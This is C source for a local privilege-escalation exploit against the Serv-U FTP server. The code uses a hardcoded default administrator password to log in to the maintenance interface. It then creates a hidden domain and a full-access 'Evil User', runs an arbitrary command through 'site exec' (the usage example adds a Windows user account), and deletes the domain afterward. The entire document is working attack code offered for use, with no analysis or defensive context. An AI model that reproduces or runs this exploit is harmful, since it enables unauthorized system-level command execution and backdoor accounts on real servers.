#pragma comment(lib,"ws2_32.lib") #include #include #include #include #include //Responses #define BANNER "220 " #define USEROK "331 User name okay" #define PASSOK "230 User logged in, proceed." #define ADMOK "230-Switching to SYSTEM MAINTENANCE mode." #define DOMAINID "200-DomainID=" //Commands #define XPLUSER "USER xl\r\n" #define XPLPASSWORD "PASS 111111\r\n" #define USER "USER LocalAdministrator\r\n" #define PASSWORD "PASS #l@$ak#.lk;0@P\r\n" #define MAINTENANCE "SITE MAINTENANCE\r\n" #define EXIT "QUIT\r\n" char newdomain[]="-SETDOMAIN\r\n" "-Domain=xl|0.0.0.0|2121|-1|1|0\r\n" "-TZOEnable=0\r\n" " TZOKey=\r\n"; /* "-DynDNSEnable=0\r\n" " DynIPName=\r\n"; */ char deldomain[]="-DELETEDOMAIN\r\n" "-IP=0.0.0.0\r\n" " PortNo=2121\r\n"; char newuser[] = "-SETUSERSETUP\r\n" "-IP=0.0.0.0\r\n" "-PortNo=2121\r\n" "-User=xl\r\n" "-Password=111111\r\n" "-HomeDir=c:\\\r\n" "-LoginMesFile=\r\n" "-Disable=0\r\n" "-RelPaths=1\r\n" "-NeedSecure=0\r\n" "-HideHidden=0\r\n" "-AlwaysAllowLogin=0\r\n" "-ChangePassword=0\r\n" "-QuotaEnable=0\r\n" "-MaxUsersLoginPerIP=-1\r\n" "-SpeedLimitUp=0\r\n" "-SpeedLimitDown=0\r\n" "-MaxNrUsers=-1\r\n" "-IdleTimeOut=600\r\n" "-SessionTimeOut=-1\r\n" "-Expire=0\r\n" "-RatioUp=1\r\n" "-RatioDown=1\r\n" "-RatiosCredit=0\r\n" "-QuotaCurrent=0\r\n" "-QuotaMaximum=0\r\n" "-Maintenance=System\r\n" "-PasswordType=Regular\r\n" "-Ratios=None\r\n" " Access=c:\\|RWAMELCDP\r\n"; #define localip "127.0.0.1" char cadena[1024]; int rec,domain; /******************************************************************************/ void ParseCommands(int sock, char *data, int ShowSend, int showResponses, char *response) { send(sock,data,strlen(data),0); if (ShowSend) printf(">%s",data); Sleep(100); do { rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0'; if (rec<=0) return; if (showResponses) printf("<%s",cadena); if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0) domain=atoi(cadena+strlen(DOMAINID)); //} while (strncmp(cadena,response,strlen(response))!=0); } while (strstr(cadena,response)==NULL); printf("******************************************************\r\n"); } /******************************************************************************/ int main(int argc, char* argv[]) { WSADATA ws; int sock,sock2; struct sockaddr_in su; struct sockaddr_in xpl; printf("Serv-u >3.x Local Exploit by xiaolu\r\n\r\n"); if (argc<3) { printf("USAGE: serv-u.exe port \"command\"\r\n"); printf("Example: serv-u.exe 43958 \"net user xl xiaoxue /add\""); return(0); } if (WSAStartup( MAKEWORD(2,2), &ws )!=0) { printf(" [-] WSAStartup() error\n"); exit(0); } su.sin_family = AF_INET; su.sin_port = htons(strtoul(argv[1],NULL,10)); su.sin_addr.s_addr = inet_addr(localip); sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(sock,( struct sockaddr *)&su,sizeof(su)); rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0'; printf("<%s",cadena); ParseCommands(sock,USER,1,1,USEROK); ParseCommands(sock,PASSWORD,1,1,PASSOK); ParseCommands(sock,MAINTENANCE,1,0,"230 "); printf("[+] Creating New Domain...\r\n"); ParseCommands(sock,newdomain,0,1,BANNER); printf("[+] Domain xl:%i Created\n",domain); /* Only for v5.x printf("[+] Setting New Domain Online\r\n"); sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n Command=DomainOnline\r\n",domain); ParseCommands(sock,cadena,0,1,BANNER); */ printf("[+] Creating Evil User\r\n"); ParseCommands(sock,newuser,0,1,"200 "); Sleep(1000); printf("[+] Now Exploiting...\r\n"); xpl.sin_family = AF_INET; xpl.sin_port = htons(2121); xpl.sin_addr.s_addr = inet_addr(localip); sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl)); rec=recv(sock2,cadena,sizeof(cadena),0); cadena[rec]='\0'; ParseCommands(sock2,XPLUSER,1,1,USEROK); ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK); printf("[+] Now Executing: %s\r\n",argv[2]); sprintf(cadena,"site exec %s\r\n",argv[2]); send(sock2,cadena,strlen(cadena),0); shutdown(sock2,SD_BOTH); Sleep(100); ParseCommands(sock,deldomain,0,1,BANNER); send(sock,EXIT,strlen(EXIT),0); shutdown(sock,SD_BOTH); closesocket(sock); closesocket(sock2); return 0; }